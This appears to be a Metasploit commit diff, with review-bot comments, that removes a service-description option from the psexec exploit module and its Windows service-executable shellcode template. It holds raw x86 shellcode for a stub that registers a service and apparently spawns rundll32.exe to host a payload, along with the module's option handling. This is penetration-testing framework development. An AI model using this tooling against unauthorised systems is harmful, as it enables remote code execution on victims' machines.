SERVICE_DESCRIPTION doesn't concern this PR
This commit is contained in:
parent
bb4e9e2d4d
commit
808f87d213
|
@ -539,20 +539,6 @@ require 'msf/core/exe/segment_injector'
|
|||
"\x00\x6A\x00\x6A\x00\x6A\x01\x6A\x10\x89\xE1\x6A\x00\x51\x50\x68" +
|
||||
"\xC6\x55\x37\x7D\xFF\xD5\x57\x68\xF0\xB5\xA2\x56\xFF\xD5"
|
||||
|
||||
code_service_description = ""
|
||||
|
||||
if opts[:servicedescription]
|
||||
pushed_service_description = string_to_pushes(opts[:servicedescription])
|
||||
|
||||
code_service_description =
|
||||
"\x68\x3F\x00\x0F\x00\x6A\x00\x6A\x00\x68\x67\xF0\x36" +
|
||||
"\x76\xFF\xD5\x89\xC7"+pushed_service_name+"\x89\xE1\x68" +
|
||||
"\xFF\x01\x0F\x00\x51\x50\x68\x56\x28\x4B\x40\xFF\xD5\x89\xC6" +
|
||||
pushed_service_description+"\x89\xE1\x6A\x00\x51\x89\xE1\x51" +
|
||||
"\x6A\x01\x50\x68\x87\xB0\x35\xED\xFF\xD5\x56\x68\xDE\xEA\x77" +
|
||||
"\xAD\xFF\xD5\x57\x68\xDE\xEA\x77\xAD\xFF\xD5"
|
||||
end
|
||||
|
||||
precode_size = 0x42
|
||||
shellcode_code_offset = code_service_stopped.length + precode_size
|
||||
|
||||
|
@ -575,8 +561,7 @@ require 'msf/core/exe/segment_injector'
|
|||
[hash_code_offset].pack('<I')+pushed_service_name+"\x89\xE1\x8D" +
|
||||
"\x85"+[svcctrlhandler_code_offset].pack('<I')+"\x6A\x00\x50\x51\x68\x0B\xAA\x44\x52\xFF\xD5" +
|
||||
"\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x04\x6A\x10" +
|
||||
"\x89\xE1\x6A\x00\x51\x50\x68\xC6\x55\x37\x7D\xFF\xD5" +
|
||||
code_service_description+"\x31\xFF\x6A" +
|
||||
"\x89\xE1\x6A\x00\x51\x50\x68\xC6\x55\x37\x7D\xFF\xD5\x31\xFF\x6A" +
|
||||
"\x04\x68\x00\x10\x00\x00\x6A\x54\x57\x68\x58\xA4\x53\xE5\xFF\xD5" +
|
||||
"\xC7\x00\x44\x00\x00\x00\x8D\x70\x44\x57\x68\x2E\x65\x78\x65\x68" +
|
||||
"\x6C\x6C\x33\x32\x68\x72\x75\x6E\x64\x89\xE1\x56\x50\x57\x57\x6A" +
|
||||
|
|
|
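Review bot: The restored stub line `"\x89\xE1\x6A\x00\x51\x50\x68\xC6\x55\x37\x7D\xFF\xD5\x31\xFF\x6A" +` in the second hunk, like the rest of this byte string, gives no hint of which API each `push <hash>; call ebp` sequence resolves, and the hand-counted `precode_size = 0x42` a few lines above it has to move in step with every byte added to or removed from the stub — exactly the coupling this revert had to unwind. I would annotate the line with `# mov ecx, esp; push 0; push ecx; push eax; push 0x7D3755C6; call ebp; xor edi, edi  -- block_api hash, presumably advapi32!SetServiceStatus (verify against the hash table)` and put a one-line warning next to `precode_size` that it is the byte length of the stub preceding the payload and must be recomputed if that stub changes. The later pushes `\x2E\x65\x78\x65`, `\x6C\x6C\x33\x32`, `\x72\x75\x6E\x64` appear to spell "rundll32.exe"; naming the host process that is spawned in a comment would also help the next reviewer. The enclosing method begins and ends outside both hunks.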
@ -83,8 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
OptString.new('SERVICE_FILENAME', [false, "Filename to to be used on target for the service binary",nil]),
|
||||
OptString.new('SERVICE_DESCRIPTION', [false, "Service description to to be used on target for pretty listing",nil])
|
||||
OptString.new('SERVICE_NAME', [false, "Servicename to to be used on target for the service binary and manager",nil]),
|
||||
OptString.new('SERVICE_DISPLAYNAME', [false, "Service displayname to to be used on target for the service manager",nil]),
|
||||
OptString.new('SERVICE_DESCRIPTION', [false, "Service description to to be used on target for pretty listing",nil])
|
||||
OptString.new('SERVICE_DISPLAYNAME', [false, "Service displayname to to be used on target for the service manager",nil])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
@ -155,7 +154,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Disconnect from the ADMIN$
|
||||
simple.disconnect("ADMIN$")
|
||||
else
|
||||
servicename = datastore['SERVICE_NAME'] || "#{rand_text_alpha(8)}"
|
||||
servicename = datastore['SERVICE_NAME'] || rand_text_alpha(8)
|
||||
servicedescription = datastore['SERVICE_DESCRIPTION'] || rand_text_alpha(rand(32)+1)
|
||||
displayname = datastore['SERVICE_DISPLAYNAME'] || 'M' + rand_text_alpha(rand(32)+1)
|
||||
|
||||
|
@ -180,6 +179,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
exe = ''
|
||||
opts = { :servicename => servicename }
|
||||
if (datastore['PAYLOAD'].include? 'x64')
|
||||
opts.merge!({ :arch => ARCH_X64 })
|
||||
end
|
||||
exe = generate_payload_exe_service(opts)
|
||||
|
||||
fd << exe
|
||||
|
|
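Review bot: `servicename = datastore['SERVICE_NAME'] || rand_text_alpha(8)` in the third hunk, and the `displayname` line below it, only fall back to a random name when the datastore value is `nil`; an empty string is truthy in Ruby, so a user who sets `SERVICE_NAME` to `""` presumably ends up with an empty name handed to `string_to_pushes` and to the service manager. A blank-aware fallback such as `servicename = datastore['SERVICE_NAME'].to_s` followed by `servicename = rand_text_alpha(8) if servicename.empty?` closes that gap, and the same pattern applies to `displayname`. In the last hunk, `if (datastore['PAYLOAD'].include? 'x64')` selects the architecture by substring of the payload name rather than its declared arch; if the payload instance is reachable here, `opts[:arch] = ARCH_X64 if payload_instance.arch.include?(ARCH_X64)` would be less fragile. The surrounding method continues outside these hunks.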